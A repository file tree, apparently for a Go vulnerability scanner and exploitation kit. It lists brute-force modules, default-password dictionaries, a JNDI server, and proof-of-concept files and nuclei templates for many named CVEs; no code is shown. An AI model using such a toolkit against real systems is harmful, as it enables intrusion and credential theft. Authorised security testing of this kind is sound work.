├── .github ├── build │ ├── linux.yml │ ├── mac.yml │ └── windows.yml └── workflows │ └── build.yml ├── .gitignore ├── LICENSE ├── README.md ├── brute ├── admin_brute.go ├── basic_brute.go ├── check_loginpage.go ├── dicts.go ├── dicts │ ├── filedic.txt │ ├── jbossuserpass.txt │ ├── tomcatuserpass.txt │ ├── top100pass.txt │ └── weblogicuserpass.txt ├── filefuzz.go ├── fuzzfingerprints.go ├── jboss_brute.go ├── tomcat_brute.go └── weblogic_brute.go ├── go.mod ├── go.sum ├── main.go ├── pkg ├── fingerprint │ ├── dicts │ │ ├── eHoleFinger.json │ │ └── localFinger.json │ ├── eHoleFingerData.go │ ├── fingerScan.go │ ├── getFavicon.go │ ├── loadFinger.go │ ├── localFingerData.go │ └── matchfinger.go ├── httpx │ ├── common │ │ ├── customheader │ │ │ ├── customheader.go │ │ │ └── doc.go │ │ ├── customlist │ │ │ ├── customlist.go │ │ │ └── doc.go │ │ ├── customports │ │ │ ├── customport.go │ │ │ └── doc.go │ │ ├── fileutil │ │ │ ├── doc.go │ │ │ └── fileutil.go │ │ ├── hashes │ │ │ ├── doc.go │ │ │ ├── hashes.go │ │ │ └── jarmhash.go │ │ ├── httputilz │ │ │ ├── doc.go │ │ │ └── httputilz.go │ │ ├── httpx │ │ │ ├── cdn.go │ │ │ ├── csp.go │ │ │ ├── doc.go │ │ │ ├── encodings.go │ │ │ ├── filter.go │ │ │ ├── http2.go │ │ │ ├── httpx.go │ │ │ ├── option.go │ │ │ ├── pipeline.go │ │ │ ├── response.go │ │ │ ├── title.go │ │ │ ├── tls.go │ │ │ └── virtualhost.go │ │ ├── regexhelper │ │ │ └── regex.go │ │ ├── slice │ │ │ ├── doc.go │ │ │ └── slice.go │ │ └── stringz │ │ │ ├── doc.go │ │ │ └── stringz.go │ ├── internal │ │ └── testutils │ │ │ └── integration.go │ └── runner │ │ ├── banner.go │ │ ├── doc.go │ │ ├── options.go │ │ ├── resume.go │ │ └── runner.go ├── jndi │ ├── jndilog.go │ └── server.go ├── log.go ├── naabu │ └── v2 │ │ └── pkg │ │ ├── privileges │ │ ├── privileges.go │ │ ├── privileges_darwin.go │ │ ├── privileges_linux.go │ │ └── privileges_win.go │ │ ├── result │ │ ├── results.go │ │ └── results_test.go │ │ ├── runner │ │ ├── banners.go │ │ ├── banners_test.go │ │ 
├── default.go │ │ ├── ips.go │ │ ├── ips_test.go │ │ ├── nmap.go │ │ ├── nmap_test.go │ │ ├── options.go │ │ ├── output.go │ │ ├── output_test.go │ │ ├── ports.go │ │ ├── ports_test.go │ │ ├── resume.go │ │ ├── runner.go │ │ ├── targets.go │ │ ├── util.go │ │ ├── util_test.go │ │ ├── validate.go │ │ └── validate_test.go │ │ └── scan │ │ ├── cdn.go │ │ ├── cdn_test.go │ │ ├── connect.go │ │ ├── connect_test.go │ │ ├── externalip.go │ │ ├── externalip_test.go │ │ ├── option.go │ │ ├── ping.go │ │ ├── ping_test.go │ │ ├── scan.go │ │ ├── scan_unix.go │ │ ├── tcpsequencer.go │ │ └── tcpsequencer_test.go └── util.go ├── pocs_go ├── Springboot │ ├── CVE-2022-22947.go │ └── CVE-2022-22965.go ├── ThinkPHP │ └── check.go ├── confluence │ ├── CVE-2021-26085.go │ ├── CVE_2021_26084.go │ ├── CVE_2022_26134.go │ └── CVE_2022_26318.go ├── f5 │ ├── CVE_2020_5902.go │ ├── CVE_2021_22986.go │ └── CVE_2022_1388.go ├── fastjson │ ├── check.go │ └── payloads.go ├── gitlab │ └── CVE_2021_22205.go ├── go_poc_check.go ├── jboss │ └── CVE_2017_12149.go ├── jenkins │ ├── CVE_2018_1000110.go │ ├── CVE_2018_1000861.go │ ├── CVE_2019_1003000.go │ └── Unauthorized.go ├── landray │ └── Landray_RCE.go ├── log4j │ ├── check.go │ └── payloads.go ├── mcms │ └── Front_Desk_sqlinject.go ├── phpunit │ └── CVE_2017_9841.go ├── seeyon │ ├── BackdoorScan.go │ ├── CNVD_2019_19299.go │ ├── CNVD_2020_62422.go │ ├── CNVD_2021_01627.go │ ├── CreateMysql.go │ ├── DownExcelBeanServlet.go │ ├── GetSessionList.go │ ├── InitDataAssess.go │ ├── ManagementStatus.go │ ├── SeeyonFastjson.go │ ├── SessionUpload.go │ └── sql.go ├── shiro │ ├── CVE_2016_4437.go │ └── dicts │ │ └── keys.txt ├── spark │ └── CVE_2022_33891.go ├── sunlogin │ └── RCE.go ├── tomcat │ ├── CVE_2017_12615.go │ └── CVE_2020_1938.go ├── tongda │ ├── api_ali_php_any_fileUpload.go │ ├── file_delete.go │ └── get_user_session.go ├── weblogic │ ├── CVE_2014_4210.go │ ├── CVE_2017_10271.go │ ├── CVE_2017_3506.go │ ├── CVE_2018_2894.go │ ├── 
CVE_2019_2725.go │ ├── CVE_2019_2729.go │ ├── CVE_2020_14882.go │ ├── CVE_2020_14883.go │ ├── CVE_2020_2883.go │ └── CVE_2021_2109.go ├── zabbix │ └── CVE-2022-23131.go └── zentao │ └── CNVD_2022_42853.go ├── pocs_yml ├── check │ ├── nucleiCheck.go │ └── xrayCheck.go ├── nucleiFiles │ ├── cnvd │ │ ├── 2018 │ │ │ └── CNVD-2018-13393.yaml │ │ ├── 2019 │ │ │ ├── CNVD-2019-01348.yaml │ │ │ ├── CNVD-2019-06255.yaml │ │ │ ├── CNVD-2019-19299.yaml │ │ │ └── CNVD-2019-32204.yaml │ │ ├── 2020 │ │ │ ├── CNVD-2020-23735.yaml │ │ │ ├── CNVD-2020-46552.yaml │ │ │ ├── CNVD-2020-56167.yaml │ │ │ ├── CNVD-2020-62422.yaml │ │ │ ├── CNVD-2020-67113.yaml │ │ │ └── CNVD-2020-68596.yaml │ │ ├── 2021 │ │ │ ├── CNVD-2021-01931.yaml │ │ │ ├── CNVD-2021-09650.yaml │ │ │ ├── CNVD-2021-10543.yaml │ │ │ ├── CNVD-2021-14536.yaml │ │ │ ├── CNVD-2021-15822.yaml │ │ │ ├── CNVD-2021-15824.yaml │ │ │ ├── CNVD-2021-17369.yaml │ │ │ ├── CNVD-2021-26422.yaml │ │ │ ├── CNVD-2021-28277.yaml │ │ │ ├── CNVD-2021-30167.yaml │ │ │ └── CNVD-2021-49104.yaml │ │ └── 2022 │ │ │ └── CNVD-2022-03672.yaml │ ├── cves │ │ ├── 2000 │ │ │ └── CVE-2000-0114.yaml │ │ ├── 2001 │ │ │ └── CVE-2001-1473.yaml │ │ ├── 2002 │ │ │ └── CVE-2002-1131.yaml │ │ ├── 2004 │ │ │ └── CVE-2004-0519.yaml │ │ ├── 2005 │ │ │ ├── CVE-2005-2428.yaml │ │ │ ├── CVE-2005-3344.yaml │ │ │ └── CVE-2005-4385.yaml │ │ ├── 2006 │ │ │ ├── CVE-2006-1681.yaml │ │ │ └── CVE-2006-2842.yaml │ │ ├── 2007 │ │ │ ├── CVE-2007-0885.yaml │ │ │ ├── CVE-2007-4504.yaml │ │ │ ├── CVE-2007-4556.yaml │ │ │ └── CVE-2007-5728.yaml │ │ ├── 2008 │ │ │ ├── CVE-2008-2398.yaml │ │ │ ├── CVE-2008-2650.yaml │ │ │ ├── CVE-2008-4668.yaml │ │ │ ├── CVE-2008-4764.yaml │ │ │ ├── CVE-2008-5587.yaml │ │ │ ├── CVE-2008-6080.yaml │ │ │ ├── CVE-2008-6172.yaml │ │ │ ├── CVE-2008-6222.yaml │ │ │ └── CVE-2008-6668.yaml │ │ ├── 2009 │ │ │ ├── CVE-2009-0545.yaml │ │ │ ├── CVE-2009-0932.yaml │ │ │ ├── CVE-2009-1151.yaml │ │ │ ├── CVE-2009-1496.yaml │ │ │ ├── CVE-2009-1558.yaml │ │ │ ├── 
CVE-2009-1872.yaml │ │ │ ├── CVE-2009-2015.yaml │ │ │ ├── CVE-2009-2100.yaml │ │ │ ├── CVE-2009-3053.yaml │ │ │ ├── CVE-2009-3318.yaml │ │ │ ├── CVE-2009-4202.yaml │ │ │ ├── CVE-2009-4223.yaml │ │ │ ├── CVE-2009-4679.yaml │ │ │ ├── CVE-2009-5020.yaml │ │ │ └── CVE-2009-5114.yaml │ │ ├── 2010 │ │ │ ├── CVE-2010-0157.yaml │ │ │ ├── CVE-2010-0219.yaml │ │ │ ├── CVE-2010-0467.yaml │ │ │ ├── CVE-2010-0696.yaml │ │ │ ├── CVE-2010-0759.yaml │ │ │ ├── CVE-2010-0942.yaml │ │ │ ├── CVE-2010-0943.yaml │ │ │ ├── CVE-2010-0944.yaml │ │ │ ├── CVE-2010-0972.yaml │ │ │ ├── CVE-2010-0982.yaml │ │ │ ├── CVE-2010-0985.yaml │ │ │ ├── CVE-2010-1056.yaml │ │ │ ├── CVE-2010-1081.yaml │ │ │ ├── CVE-2010-1217.yaml │ │ │ ├── CVE-2010-1219.yaml │ │ │ ├── CVE-2010-1302.yaml │ │ │ ├── CVE-2010-1304.yaml │ │ │ ├── CVE-2010-1305.yaml │ │ │ ├── CVE-2010-1306.yaml │ │ │ ├── CVE-2010-1307.yaml │ │ │ ├── CVE-2010-1308.yaml │ │ │ ├── CVE-2010-1312.yaml │ │ │ ├── CVE-2010-1313.yaml │ │ │ ├── CVE-2010-1314.yaml │ │ │ ├── CVE-2010-1315.yaml │ │ │ ├── CVE-2010-1340.yaml │ │ │ ├── CVE-2010-1345.yaml │ │ │ ├── CVE-2010-1352.yaml │ │ │ ├── CVE-2010-1353.yaml │ │ │ ├── CVE-2010-1354.yaml │ │ │ ├── CVE-2010-1461.yaml │ │ │ ├── CVE-2010-1469.yaml │ │ │ ├── CVE-2010-1470.yaml │ │ │ ├── CVE-2010-1471.yaml │ │ │ ├── CVE-2010-1472.yaml │ │ │ ├── CVE-2010-1473.yaml │ │ │ ├── CVE-2010-1474.yaml │ │ │ ├── CVE-2010-1475.yaml │ │ │ ├── CVE-2010-1476.yaml │ │ │ ├── CVE-2010-1478.yaml │ │ │ ├── CVE-2010-1491.yaml │ │ │ ├── CVE-2010-1494.yaml │ │ │ ├── CVE-2010-1495.yaml │ │ │ ├── CVE-2010-1531.yaml │ │ │ ├── CVE-2010-1532.yaml │ │ │ ├── CVE-2010-1533.yaml │ │ │ ├── CVE-2010-1534.yaml │ │ │ ├── CVE-2010-1535.yaml │ │ │ ├── CVE-2010-1540.yaml │ │ │ ├── CVE-2010-1601.yaml │ │ │ ├── CVE-2010-1602.yaml │ │ │ ├── CVE-2010-1603.yaml │ │ │ ├── CVE-2010-1607.yaml │ │ │ ├── CVE-2010-1653.yaml │ │ │ ├── CVE-2010-1657.yaml │ │ │ ├── CVE-2010-1658.yaml │ │ │ ├── CVE-2010-1659.yaml │ │ │ ├── CVE-2010-1714.yaml │ │ │ ├── 
CVE-2010-1715.yaml │ │ │ ├── CVE-2010-1717.yaml │ │ │ ├── CVE-2010-1718.yaml │ │ │ ├── CVE-2010-1719.yaml │ │ │ ├── CVE-2010-1722.yaml │ │ │ ├── CVE-2010-1723.yaml │ │ │ ├── CVE-2010-1858.yaml │ │ │ ├── CVE-2010-1870.yaml │ │ │ ├── CVE-2010-1875.yaml │ │ │ ├── CVE-2010-1878.yaml │ │ │ ├── CVE-2010-1952.yaml │ │ │ ├── CVE-2010-1953.yaml │ │ │ ├── CVE-2010-1954.yaml │ │ │ ├── CVE-2010-1955.yaml │ │ │ ├── CVE-2010-1956.yaml │ │ │ ├── CVE-2010-1957.yaml │ │ │ ├── CVE-2010-1977.yaml │ │ │ ├── CVE-2010-1979.yaml │ │ │ ├── CVE-2010-1980.yaml │ │ │ ├── CVE-2010-1981.yaml │ │ │ ├── CVE-2010-1982.yaml │ │ │ ├── CVE-2010-1983.yaml │ │ │ ├── CVE-2010-2033.yaml │ │ │ ├── CVE-2010-2034.yaml │ │ │ ├── CVE-2010-2035.yaml │ │ │ ├── CVE-2010-2036.yaml │ │ │ ├── CVE-2010-2037.yaml │ │ │ ├── CVE-2010-2045.yaml │ │ │ ├── CVE-2010-2050.yaml │ │ │ ├── CVE-2010-2122.yaml │ │ │ ├── CVE-2010-2128.yaml │ │ │ ├── CVE-2010-2259.yaml │ │ │ ├── CVE-2010-2307.yaml │ │ │ ├── CVE-2010-2507.yaml │ │ │ ├── CVE-2010-2680.yaml │ │ │ ├── CVE-2010-2682.yaml │ │ │ ├── CVE-2010-2857.yaml │ │ │ ├── CVE-2010-2861.yaml │ │ │ ├── CVE-2010-2918.yaml │ │ │ ├── CVE-2010-2920.yaml │ │ │ ├── CVE-2010-3203.yaml │ │ │ ├── CVE-2010-3426.yaml │ │ │ ├── CVE-2010-4231.yaml │ │ │ ├── CVE-2010-4239.yaml │ │ │ ├── CVE-2010-4282.yaml │ │ │ ├── CVE-2010-4617.yaml │ │ │ ├── CVE-2010-4719.yaml │ │ │ ├── CVE-2010-4769.yaml │ │ │ ├── CVE-2010-4977.yaml │ │ │ ├── CVE-2010-5028.yaml │ │ │ ├── CVE-2010-5278.yaml │ │ │ └── CVE-2010-5286.yaml │ │ ├── 2011 │ │ │ ├── CVE-2011-0049.yaml │ │ │ ├── CVE-2011-1669.yaml │ │ │ ├── CVE-2011-2744.yaml │ │ │ ├── CVE-2011-2780.yaml │ │ │ ├── CVE-2011-3315.yaml │ │ │ ├── CVE-2011-4336.yaml │ │ │ ├── CVE-2011-4618.yaml │ │ │ ├── CVE-2011-4624.yaml │ │ │ ├── CVE-2011-4804.yaml │ │ │ ├── CVE-2011-4926.yaml │ │ │ ├── CVE-2011-5106.yaml │ │ │ ├── CVE-2011-5107.yaml │ │ │ ├── CVE-2011-5179.yaml │ │ │ ├── CVE-2011-5181.yaml │ │ │ └── CVE-2011-5265.yaml │ │ ├── 2012 │ │ │ ├── CVE-2012-0392.yaml │ │ │ ├── 
CVE-2012-0896.yaml │ │ │ ├── CVE-2012-0901.yaml │ │ │ ├── CVE-2012-0981.yaml │ │ │ ├── CVE-2012-0991.yaml │ │ │ ├── CVE-2012-0996.yaml │ │ │ ├── CVE-2012-1226.yaml │ │ │ ├── CVE-2012-1823.yaml │ │ │ ├── CVE-2012-1835.yaml │ │ │ ├── CVE-2012-2371.yaml │ │ │ ├── CVE-2012-3153.yaml │ │ │ ├── CVE-2012-4242.yaml │ │ │ ├── CVE-2012-4253.yaml │ │ │ ├── CVE-2012-4273.yaml │ │ │ ├── CVE-2012-4547.yaml │ │ │ ├── CVE-2012-4768.yaml │ │ │ ├── CVE-2012-4878.yaml │ │ │ ├── CVE-2012-4889.yaml │ │ │ ├── CVE-2012-4940.yaml │ │ │ └── CVE-2012-5913.yaml │ │ ├── 2013 │ │ │ ├── CVE-2013-1965.yaml │ │ │ ├── CVE-2013-2248.yaml │ │ │ ├── CVE-2013-2251.yaml │ │ │ ├── CVE-2013-2287.yaml │ │ │ ├── CVE-2013-3526.yaml │ │ │ ├── CVE-2013-3827.yaml │ │ │ ├── CVE-2013-4117.yaml │ │ │ ├── CVE-2013-4625.yaml │ │ │ ├── CVE-2013-5528.yaml │ │ │ ├── CVE-2013-5979.yaml │ │ │ ├── CVE-2013-6281.yaml │ │ │ ├── CVE-2013-7091.yaml │ │ │ └── CVE-2013-7240.yaml │ │ ├── 2014 │ │ │ ├── CVE-2014-10037.yaml │ │ │ ├── CVE-2014-2321.yaml │ │ │ ├── CVE-2014-2323.yaml │ │ │ ├── CVE-2014-2383.yaml │ │ │ ├── CVE-2014-2908.yaml │ │ │ ├── CVE-2014-2962.yaml │ │ │ ├── CVE-2014-3120.yaml │ │ │ ├── CVE-2014-3206.yaml │ │ │ ├── CVE-2014-3704.yaml │ │ │ ├── CVE-2014-3744.yaml │ │ │ ├── CVE-2014-4210.yaml │ │ │ ├── CVE-2014-4513.yaml │ │ │ ├── CVE-2014-4535.yaml │ │ │ ├── CVE-2014-4536.yaml │ │ │ ├── CVE-2014-4539.yaml │ │ │ ├── CVE-2014-4544.yaml │ │ │ ├── CVE-2014-4550.yaml │ │ │ ├── CVE-2014-4558.yaml │ │ │ ├── CVE-2014-4561.yaml │ │ │ ├── CVE-2014-4592.yaml │ │ │ ├── CVE-2014-4940.yaml │ │ │ ├── CVE-2014-5111.yaml │ │ │ ├── CVE-2014-5258.yaml │ │ │ ├── CVE-2014-5368.yaml │ │ │ ├── CVE-2014-6271.yaml │ │ │ ├── CVE-2014-6308.yaml │ │ │ ├── CVE-2014-8682.yaml │ │ │ ├── CVE-2014-8799.yaml │ │ │ ├── CVE-2014-9094.yaml │ │ │ ├── CVE-2014-9444.yaml │ │ │ ├── CVE-2014-9606.yaml │ │ │ ├── CVE-2014-9607.yaml │ │ │ ├── CVE-2014-9608.yaml │ │ │ ├── CVE-2014-9609.yaml │ │ │ ├── CVE-2014-9614.yaml │ │ │ ├── CVE-2014-9615.yaml │ │ │ ├── 
CVE-2014-9617.yaml │ │ │ └── CVE-2014-9618.yaml │ │ ├── 2015 │ │ │ ├── CVE-2015-0554.yaml │ │ │ ├── CVE-2015-1000012.yaml │ │ │ ├── CVE-2015-1427.yaml │ │ │ ├── CVE-2015-1503.yaml │ │ │ ├── CVE-2015-1880.yaml │ │ │ ├── CVE-2015-2067.yaml │ │ │ ├── CVE-2015-2068.yaml │ │ │ ├── CVE-2015-2080.yaml │ │ │ ├── CVE-2015-2166.yaml │ │ │ ├── CVE-2015-2807.yaml │ │ │ ├── CVE-2015-3224.yaml │ │ │ ├── CVE-2015-3306.yaml │ │ │ ├── CVE-2015-3337.yaml │ │ │ ├── CVE-2015-3648.yaml │ │ │ ├── CVE-2015-3897.yaml │ │ │ ├── CVE-2015-4050.yaml │ │ │ ├── CVE-2015-4414.yaml │ │ │ ├── CVE-2015-4632.yaml │ │ │ ├── CVE-2015-4694.yaml │ │ │ ├── CVE-2015-5354.yaml │ │ │ ├── CVE-2015-5461.yaml │ │ │ ├── CVE-2015-5471.yaml │ │ │ ├── CVE-2015-5531.yaml │ │ │ ├── CVE-2015-5688.yaml │ │ │ ├── CVE-2015-6477.yaml │ │ │ ├── CVE-2015-6544.yaml │ │ │ ├── CVE-2015-6920.yaml │ │ │ ├── CVE-2015-7297.yaml │ │ │ ├── CVE-2015-7377.yaml │ │ │ ├── CVE-2015-7450.yaml │ │ │ ├── CVE-2015-7780.yaml │ │ │ ├── CVE-2015-7823.yaml │ │ │ ├── CVE-2015-8349.yaml │ │ │ ├── CVE-2015-8399.yaml │ │ │ ├── CVE-2015-8813.yaml │ │ │ ├── CVE-2015-9414.yaml │ │ │ └── CVE-2015-9480.yaml │ │ ├── 2016 │ │ │ ├── CVE-2016-0957.yaml │ │ │ ├── CVE-2016-1000126.yaml │ │ │ ├── CVE-2016-1000127.yaml │ │ │ ├── CVE-2016-1000128.yaml │ │ │ ├── CVE-2016-1000129.yaml │ │ │ ├── CVE-2016-1000130.yaml │ │ │ ├── CVE-2016-1000131.yaml │ │ │ ├── CVE-2016-1000132.yaml │ │ │ ├── CVE-2016-1000133.yaml │ │ │ ├── CVE-2016-1000134.yaml │ │ │ ├── CVE-2016-1000135.yaml │ │ │ ├── CVE-2016-1000136.yaml │ │ │ ├── CVE-2016-1000137.yaml │ │ │ ├── CVE-2016-1000138.yaml │ │ │ ├── CVE-2016-1000139.yaml │ │ │ ├── CVE-2016-1000140.yaml │ │ │ ├── CVE-2016-1000141.yaml │ │ │ ├── CVE-2016-1000142.yaml │ │ │ ├── CVE-2016-1000143.yaml │ │ │ ├── CVE-2016-1000146.yaml │ │ │ ├── CVE-2016-1000148.yaml │ │ │ ├── CVE-2016-1000149.yaml │ │ │ ├── CVE-2016-1000152.yaml │ │ │ ├── CVE-2016-1000153.yaml │ │ │ ├── CVE-2016-1000154.yaml │ │ │ ├── CVE-2016-1000155.yaml │ │ │ ├── 
CVE-2016-10033.yaml │ │ │ ├── CVE-2016-10134.yaml │ │ │ ├── CVE-2016-10924.yaml │ │ │ ├── CVE-2016-10940.yaml │ │ │ ├── CVE-2016-10956.yaml │ │ │ ├── CVE-2016-10960.yaml │ │ │ ├── CVE-2016-10993.yaml │ │ │ ├── CVE-2016-1555.yaml │ │ │ ├── CVE-2016-2004.yaml │ │ │ ├── CVE-2016-2389.yaml │ │ │ ├── CVE-2016-3081.yaml │ │ │ ├── CVE-2016-3088.yaml │ │ │ ├── CVE-2016-3978.yaml │ │ │ ├── CVE-2016-4975.yaml │ │ │ ├── CVE-2016-4977.yaml │ │ │ ├── CVE-2016-5649.yaml │ │ │ ├── CVE-2016-6210.yaml │ │ │ ├── CVE-2016-6277.yaml │ │ │ ├── CVE-2016-7552.yaml │ │ │ ├── CVE-2016-7981.yaml │ │ │ └── CVE-2016-8527.yaml │ │ ├── 2017 │ │ │ ├── CVE-2017-0929.yaml │ │ │ ├── CVE-2017-1000028.yaml │ │ │ ├── CVE-2017-1000029.yaml │ │ │ ├── CVE-2017-1000170.yaml │ │ │ ├── CVE-2017-1000486.yaml │ │ │ ├── CVE-2017-10075.yaml │ │ │ ├── CVE-2017-10271.yaml │ │ │ ├── CVE-2017-10974.yaml │ │ │ ├── CVE-2017-11444.yaml │ │ │ ├── CVE-2017-11512.yaml │ │ │ ├── CVE-2017-11610.yaml │ │ │ ├── CVE-2017-12138.yaml │ │ │ ├── CVE-2017-12149.yaml │ │ │ ├── CVE-2017-12542.yaml │ │ │ ├── CVE-2017-12544.yaml │ │ │ ├── CVE-2017-12583.yaml │ │ │ ├── CVE-2017-12611.yaml │ │ │ ├── CVE-2017-12615.yaml │ │ │ ├── CVE-2017-12629.yaml │ │ │ ├── CVE-2017-12635.yaml │ │ │ ├── CVE-2017-12637.yaml │ │ │ ├── CVE-2017-12794.yaml │ │ │ ├── CVE-2017-14135.yaml │ │ │ ├── CVE-2017-14535.yaml │ │ │ ├── CVE-2017-14537.yaml │ │ │ ├── CVE-2017-14651.yaml │ │ │ ├── CVE-2017-14849.yaml │ │ │ ├── CVE-2017-15287.yaml │ │ │ ├── CVE-2017-15363.yaml │ │ │ ├── CVE-2017-15647.yaml │ │ │ ├── CVE-2017-15715.yaml │ │ │ ├── CVE-2017-15944.yaml │ │ │ ├── CVE-2017-16806.yaml │ │ │ ├── CVE-2017-16877.yaml │ │ │ ├── CVE-2017-17043.yaml │ │ │ ├── CVE-2017-17059.yaml │ │ │ ├── CVE-2017-17451.yaml │ │ │ ├── CVE-2017-17562.yaml │ │ │ ├── CVE-2017-18024.yaml │ │ │ ├── CVE-2017-18536.yaml │ │ │ ├── CVE-2017-18598.yaml │ │ │ ├── CVE-2017-18638.yaml │ │ │ ├── CVE-2017-3506.yaml │ │ │ ├── CVE-2017-3528.yaml │ │ │ ├── CVE-2017-3881.yaml │ │ │ ├── 
CVE-2017-4011.yaml │ │ │ ├── CVE-2017-5487.yaml │ │ │ ├── CVE-2017-5521.yaml │ │ │ ├── CVE-2017-5631.yaml │ │ │ ├── CVE-2017-5638.yaml │ │ │ ├── CVE-2017-5982.yaml │ │ │ ├── CVE-2017-6090.yaml │ │ │ ├── CVE-2017-7269.yaml │ │ │ ├── CVE-2017-7391.yaml │ │ │ ├── CVE-2017-7615.yaml │ │ │ ├── CVE-2017-7921.yaml │ │ │ ├── CVE-2017-8917.yaml │ │ │ ├── CVE-2017-9140.yaml │ │ │ ├── CVE-2017-9288.yaml │ │ │ ├── CVE-2017-9506.yaml │ │ │ ├── CVE-2017-9791.yaml │ │ │ ├── CVE-2017-9805.yaml │ │ │ ├── CVE-2017-9822.yaml │ │ │ ├── CVE-2017-9833.yaml │ │ │ └── CVE-2017-9841.yaml │ │ ├── 2018 │ │ │ ├── CVE-2018-0127.yaml │ │ │ ├── CVE-2018-0296.yaml │ │ │ ├── CVE-2018-1000129.yaml │ │ │ ├── CVE-2018-1000130.yaml │ │ │ ├── CVE-2018-1000226.yaml │ │ │ ├── CVE-2018-1000533.yaml │ │ │ ├── CVE-2018-1000600.yaml │ │ │ ├── CVE-2018-1000861.yaml │ │ │ ├── CVE-2018-10093.yaml │ │ │ ├── CVE-2018-10095.yaml │ │ │ ├── CVE-2018-10141.yaml │ │ │ ├── CVE-2018-10201.yaml │ │ │ ├── CVE-2018-10230.yaml │ │ │ ├── CVE-2018-10562.yaml │ │ │ ├── CVE-2018-10818.yaml │ │ │ ├── CVE-2018-10822.yaml │ │ │ ├── CVE-2018-10823.yaml │ │ │ ├── CVE-2018-10956.yaml │ │ │ ├── CVE-2018-11231.yaml │ │ │ ├── CVE-2018-11409.yaml │ │ │ ├── CVE-2018-11709.yaml │ │ │ ├── CVE-2018-11759.yaml │ │ │ ├── CVE-2018-11776.yaml │ │ │ ├── CVE-2018-11784.yaml │ │ │ ├── CVE-2018-12031.yaml │ │ │ ├── CVE-2018-12054.yaml │ │ │ ├── CVE-2018-1207.yaml │ │ │ ├── CVE-2018-12095.yaml │ │ │ ├── CVE-2018-12296.yaml │ │ │ ├── CVE-2018-12300.yaml │ │ │ ├── CVE-2018-12613.yaml │ │ │ ├── CVE-2018-12634.yaml │ │ │ ├── CVE-2018-12675.yaml │ │ │ ├── CVE-2018-1271.yaml │ │ │ ├── CVE-2018-1273.yaml │ │ │ ├── CVE-2018-12998.yaml │ │ │ ├── CVE-2018-1335.yaml │ │ │ ├── CVE-2018-13379.yaml │ │ │ ├── CVE-2018-13380.yaml │ │ │ ├── CVE-2018-13980.yaml │ │ │ ├── CVE-2018-14013.yaml │ │ │ ├── CVE-2018-14064.yaml │ │ │ ├── CVE-2018-14474.yaml │ │ │ ├── CVE-2018-14574.yaml │ │ │ ├── CVE-2018-14728.yaml │ │ │ ├── CVE-2018-14912.yaml │ │ │ ├── CVE-2018-14916.yaml 
│ │ │ ├── CVE-2018-14931.yaml │ │ │ ├── CVE-2018-15138.yaml │ │ │ ├── CVE-2018-15473.yaml │ │ │ ├── CVE-2018-15517.yaml │ │ │ ├── CVE-2018-15535.yaml │ │ │ ├── CVE-2018-15745.yaml │ │ │ ├── CVE-2018-15961.yaml │ │ │ ├── CVE-2018-16059.yaml │ │ │ ├── CVE-2018-16133.yaml │ │ │ ├── CVE-2018-16167.yaml │ │ │ ├── CVE-2018-16283.yaml │ │ │ ├── CVE-2018-16288.yaml │ │ │ ├── CVE-2018-16299.yaml │ │ │ ├── CVE-2018-16341.yaml │ │ │ ├── CVE-2018-16668.yaml │ │ │ ├── CVE-2018-16670.yaml │ │ │ ├── CVE-2018-16671.yaml │ │ │ ├── CVE-2018-16716.yaml │ │ │ ├── CVE-2018-16761.yaml │ │ │ ├── CVE-2018-16763.yaml │ │ │ ├── CVE-2018-16836.yaml │ │ │ ├── CVE-2018-17246.yaml │ │ │ ├── CVE-2018-17254.yaml │ │ │ ├── CVE-2018-17422.yaml │ │ │ ├── CVE-2018-17431.yaml │ │ │ ├── CVE-2018-18069.yaml │ │ │ ├── CVE-2018-18264.yaml │ │ │ ├── CVE-2018-18323.yaml │ │ │ ├── CVE-2018-18570.yaml │ │ │ ├── CVE-2018-18608.yaml │ │ │ ├── CVE-2018-18775.yaml │ │ │ ├── CVE-2018-18777.yaml │ │ │ ├── CVE-2018-18778.yaml │ │ │ ├── CVE-2018-18925.yaml │ │ │ ├── CVE-2018-19326.yaml │ │ │ ├── CVE-2018-19365.yaml │ │ │ ├── CVE-2018-19386.yaml │ │ │ ├── CVE-2018-19439.yaml │ │ │ ├── CVE-2018-19458.yaml │ │ │ ├── CVE-2018-19753.yaml │ │ │ ├── CVE-2018-20462.yaml │ │ │ ├── CVE-2018-20470.yaml │ │ │ ├── CVE-2018-20824.yaml │ │ │ ├── CVE-2018-20985.yaml │ │ │ ├── CVE-2018-2392.yaml │ │ │ ├── CVE-2018-2628.yaml │ │ │ ├── CVE-2018-2791.yaml │ │ │ ├── CVE-2018-2893.yaml │ │ │ ├── CVE-2018-2894.yaml │ │ │ ├── CVE-2018-3167.yaml │ │ │ ├── CVE-2018-3238.yaml │ │ │ ├── CVE-2018-3714.yaml │ │ │ ├── CVE-2018-3760.yaml │ │ │ ├── CVE-2018-3810.yaml │ │ │ ├── CVE-2018-5230.yaml │ │ │ ├── CVE-2018-5233.yaml │ │ │ ├── CVE-2018-5316.yaml │ │ │ ├── CVE-2018-5715.yaml │ │ │ ├── CVE-2018-6008.yaml │ │ │ ├── CVE-2018-6200.yaml │ │ │ ├── CVE-2018-6910.yaml │ │ │ ├── CVE-2018-7251.yaml │ │ │ ├── CVE-2018-7422.yaml │ │ │ ├── CVE-2018-7467.yaml │ │ │ ├── CVE-2018-7490.yaml │ │ │ ├── CVE-2018-7600.yaml │ │ │ ├── CVE-2018-7602.yaml │ │ │ ├── 
CVE-2018-7662.yaml │ │ │ ├── CVE-2018-7700.yaml │ │ │ ├── CVE-2018-7719.yaml │ │ │ ├── CVE-2018-8006.yaml │ │ │ ├── CVE-2018-8033.yaml │ │ │ ├── CVE-2018-8715.yaml │ │ │ ├── CVE-2018-8719.yaml │ │ │ ├── CVE-2018-8727.yaml │ │ │ ├── CVE-2018-8770.yaml │ │ │ ├── CVE-2018-9118.yaml │ │ │ ├── CVE-2018-9161.yaml │ │ │ ├── CVE-2018-9205.yaml │ │ │ ├── CVE-2018-9845.yaml │ │ │ └── CVE-2018-9995.yaml │ │ ├── 2019 │ │ │ ├── CVE-2019-0193.yaml │ │ │ ├── CVE-2019-0221.yaml │ │ │ ├── CVE-2019-0230.yaml │ │ │ ├── CVE-2019-10068.yaml │ │ │ ├── CVE-2019-10092.yaml │ │ │ ├── CVE-2019-1010287.yaml │ │ │ ├── CVE-2019-1010290.yaml │ │ │ ├── CVE-2019-10232.yaml │ │ │ ├── CVE-2019-10405.yaml │ │ │ ├── CVE-2019-10475.yaml │ │ │ ├── CVE-2019-10758.yaml │ │ │ ├── CVE-2019-11013.yaml │ │ │ ├── CVE-2019-11248.yaml │ │ │ ├── CVE-2019-11510.yaml │ │ │ ├── CVE-2019-11580.yaml │ │ │ ├── CVE-2019-11581.yaml │ │ 